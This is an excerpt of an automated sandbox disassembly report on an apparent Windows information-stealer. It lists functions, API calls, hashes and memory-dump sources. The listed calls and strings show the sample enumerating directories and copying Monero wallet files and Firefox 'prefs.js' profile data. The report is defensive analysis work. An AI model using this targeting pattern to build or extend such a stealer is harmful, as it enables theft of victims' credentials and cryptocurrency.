                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*$h
                          • API String ID: 671575355-2685894120
                          • Opcode ID: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                          • Instruction ID: 9fb4a68e76a8f11cef5f80f255d5ce961b7dfaeaa695682f216887ff39fb0488
                          • Opcode Fuzzy Hash: 78eb76d3e2728e804953fdc3e252be917b39748e627dbee17545957aca917dbd
                          • Instruction Fuzzy Hash: CF5166B290021C9FCB25EBB0DC89FED777CEB58304F404588F60996190EB759B898F92
                          Function 00393EA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00393EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00393EDA
                          • StrCmpCA.SHLWAPI(?,003A0FAC), ref: 00393F08
                          • StrCmpCA.SHLWAPI(?,003A0FB0), ref: 00393F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0039406C
                          • FindClose.KERNEL32(000000FF), ref: 00394081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$h
                          • API String ID: 180737720-3418665255
                          • Opcode ID: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                          • Instruction ID: ac134226c8a142292185540a1a6c4351128ecff7f9b773924a59eb9737d7c940
                          • Opcode Fuzzy Hash: 825499c665a6fb28f6f7ed5093a704ddb6b3af131655246e4e26740c846ba1cc
                          • Instruction Fuzzy Hash: 4F5156B2900618AFCF25FBB0DC85EEA777CBB54704F004588F65996040EB759B8A8F91
                          Function 0038ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0038ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0038ED55
                          • StrCmpCA.SHLWAPI(?,003A1538), ref: 0038EDAB
                          • StrCmpCA.SHLWAPI(?,003A153C), ref: 0038EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0038F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                          • Instruction ID: 5cb5283eba525e577deeeabbedd988c94372c50047f3a96566bf2890de7373ea
                          • Opcode Fuzzy Hash: db1615eeeea62dd4f8f7c49b106757dc41fdd83c57e9c2490b61f211f9b56656
                          • Instruction Fuzzy Hash: 1FE1F1729116189AEF56FB60CC52EEE7778AF54300F4042D9B50A66052EF306F8ADF92
                          Function 0038F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A15B8,003A0D96), ref: 0038F71E
                          • StrCmpCA.SHLWAPI(?,003A15BC), ref: 0038F76F
                          • StrCmpCA.SHLWAPI(?,003A15C0), ref: 0038F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0038FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                          • Instruction ID: 345190553593bfe3a6165fd0bb3eb4775beada9ea58b0bd76d1a38f9673c7302
                          • Opcode Fuzzy Hash: c850de1f326e7325085e5567317f8e005f8b5387cead9a951ecbb7ab576a05b2
                          • Instruction Fuzzy Hash: 9DB130719106189FDF26FB60DC96EEE7779AF54300F4082A8E40A9A141EF316B49CFD2
                          Function 003816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A510C,?,?,?,003A51B4,?,?,00000000,?,00000000), ref: 00381923
                          • StrCmpCA.SHLWAPI(?,003A525C), ref: 00381973
                          • StrCmpCA.SHLWAPI(?,003A5304), ref: 00381989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00381D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00381DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00381E20
                          • FindClose.KERNEL32(000000FF), ref: 00381E32
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                          • Instruction ID: 3a0518717faf1c9664d67be8a45899cd1d89ffe58afa35426af9825ce381a83b
                          • Opcode Fuzzy Hash: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                          • Instruction Fuzzy Hash: 7A12DD719246189BDF1AFB60CC96EEE7778AF54300F404299B50A6A091EF306F89DFD1
                          Function 0038DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003A0C2E), ref: 0038DE5E
                          • StrCmpCA.SHLWAPI(?,003A14C8), ref: 0038DEAE
                          • StrCmpCA.SHLWAPI(?,003A14CC), ref: 0038DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0038E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                          • Instruction ID: 657f861a02882f2d322ce1ba1b83a16218c053819411782396eb43c43196ee86
                          • Opcode Fuzzy Hash: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                          • Instruction Fuzzy Hash: 18F180718246289ADF17FB60DC95EEE7778BF54300F5042D9A40A66091EF306F8ADF91
                          Function 0038DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A14B0,003A0C2A), ref: 0038DAEB
                          • StrCmpCA.SHLWAPI(?,003A14B4), ref: 0038DB33
                          • StrCmpCA.SHLWAPI(?,003A14B8), ref: 0038DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0038DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                          • Instruction ID: 22a5c966a220b8164038bfbea6eca7a428759c6bdf09bc6190cb3fb49b186b33
                          • Opcode Fuzzy Hash: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                          • Instruction Fuzzy Hash: 369124729106189BDF16FBB0EC56DED777DAF94300F408658F90A9A181EE349B0D8BD2
                          Function 0074DC9C Relevance: 11.6, Strings: 8, Instructions: 1622COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1yg$8F$:dv$P{$Vo1s$aZ$~]+$(Xs
                          • API String ID: 0-3018912018
                          • Opcode ID: e2db3df146af9b82eca178762573702ace902ea5f1c37097785231ed54d0e380
                          • Instruction ID: fb7c940d204a6adf3953666379515c40e21e06c130bbd43fa93e36e257cf604f
                          • Opcode Fuzzy Hash: e2db3df146af9b82eca178762573702ace902ea5f1c37097785231ed54d0e380
                          • Instruction Fuzzy Hash: 57B226B3A082149FE3046E2DEC8567AFBE9EF94720F1A493DEAC4C7744E63558018797
                          Function 00397B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,003A05AF), ref: 00397BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00397BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00397C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00397C62
                          • LocalFree.KERNEL32(00000000), ref: 00397D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                          • Instruction ID: 80e97e073348eac0fe9352ec6d92739cfdacc90ccade130b803cc1e2d0414caf
                          • Opcode Fuzzy Hash: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                          • Instruction Fuzzy Hash: 5A415A7191062CABDF25DB94DC99BEEB7B8FF44700F204299E00966180DB342F89CFA1
                          Function 0038E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003A0D73), ref: 0038E4A2
                          • StrCmpCA.SHLWAPI(?,003A14F8), ref: 0038E4F2
                          • StrCmpCA.SHLWAPI(?,003A14FC), ref: 0038E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0038EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                          • Instruction ID: 9a79cb98fdb2171a009494959310fdda1a216af0c902e4b15f9f8e1ccd601a32
                          • Opcode Fuzzy Hash: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                          • Instruction Fuzzy Hash: 2D1231719106189BDF1AFBA0DC96EED7778AF54300F4046A8B50A9A091EF306F49CFD2
                          Function 00748B29 Relevance: 9.2, Strings: 6, Instructions: 1717COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
